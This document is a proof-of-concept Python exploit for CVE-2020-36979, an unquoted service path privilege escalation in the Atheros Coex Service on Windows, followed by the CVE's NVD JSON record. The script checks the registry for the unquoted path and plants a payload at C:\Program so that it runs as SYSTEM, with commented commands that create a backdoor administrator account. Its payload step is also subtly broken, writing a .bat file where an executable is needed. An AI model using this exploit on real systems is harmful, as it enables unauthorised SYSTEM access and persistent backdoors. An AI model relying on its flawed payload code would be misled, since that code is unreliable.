CVE-2020-36979

# CVE-2020-36979 PoC - Atheros Coex Service Unquoted Service Path # This PoC demonstrates how to exploit the unquoted service path vulnerability # to escalate privileges to SYSTEM level import os import sys import shutil def check_vulnerability(): """Check if the vulnerable service exists and has unquoted path""" try: import winreg key = winreg.OpenKey( winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services\Atheros Coex Agent" ) path, _ = winreg.QueryValueEx(key, "ImagePath") winreg.CloseKey(key) print(f"[+] Service path: {path}") # Check if path is unquoted if '"' not in path: print("[!] Vulnerability confirmed: Path is not quoted") return path else: print("[-] Path is properly quoted, vulnerability may be patched") return None except WindowsError as e: print(f"[-] Service not found or access denied: {e}") return None def create_payload(payload_path="C:\\Program.exe"): """Create a malicious executable in the unquoted path location""" # Create a simple reverse shell payload or add your own malicious code malicious_code = ''' #include <windows.h> #include <stdio.h> int main() { // Add your malicious code here // This will run with SYSTEM privileges MessageBox(NULL, "Privilege Escalation Successful!", "CVE-2020-36979", MB_OK); // Example: Create a new admin user // system("net user hacker P@ssw0rd123 /add"); // system("net localgroup administrators hacker /add"); return 0; } ''' # For demonstration, create a simple batch file as payload batch_content = '''@echo off echo Privilege Escalation via CVE-2020-36979 > C:\\poc_success.txt ''' try: with open(payload_path.replace(".exe", ".bat"), 'w') as f: f.write(batch_content) print(f"[+] Payload created at {payload_path}") return True except Exception as e: print(f"[-] Failed to create payload: {e}") return False def main(): print("=" * 60) print("CVE-2020-36979 - Atheros Coex Service Unquoted Path Exploit") print("=" * 60) # Check if vulnerable path = check_vulnerability() if path: print("\n[!] Target is vulnerable!") print("[*] Exploitation requires:") print(" 1. Write access to a directory in the service path") print(" 2. Ability to restart the service or wait for reboot") # For authorized testing only if len(sys.argv) > 1 and sys.argv[1] == "--exploit": create_payload() print("[*] Payload created. Service restart required for exploitation.") else: print("[-] Target is not vulnerable or service not found") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2020-36979", "sourceIdentifier": "[email protected]", "published": "2026-01-27T19:16:10.787", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Atheros Coex Service Application 8.0.0.255 contains an unquoted service path vulnerability in its Windows service configuration. Attackers can exploit the unquoted path by placing malicious executables in the service path to gain elevated system privileges during service startup."}, {"lang": "es", "value": "Atheros Coex Service Application 8.0.0.255 contiene una vulnerabilidad de ruta de servicio sin comillas en su configuración de servicio de Windows. Los atacantes pueden explotar la ruta sin comillas al colocar ejecutables maliciosos en la ruta del servicio para obtener privilegios de sistema elevados durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.boostbyreason.com/resource-file-9102-ath_coexagent-exe.aspx", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49053", "source": "[email protected]"}, {"url": "https://www.file.net/process/ath_coexagent.exe.html", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/atheros-coex-service-application-zatheros-btwlan-coex-agent-unquoted-service-path", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49053", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}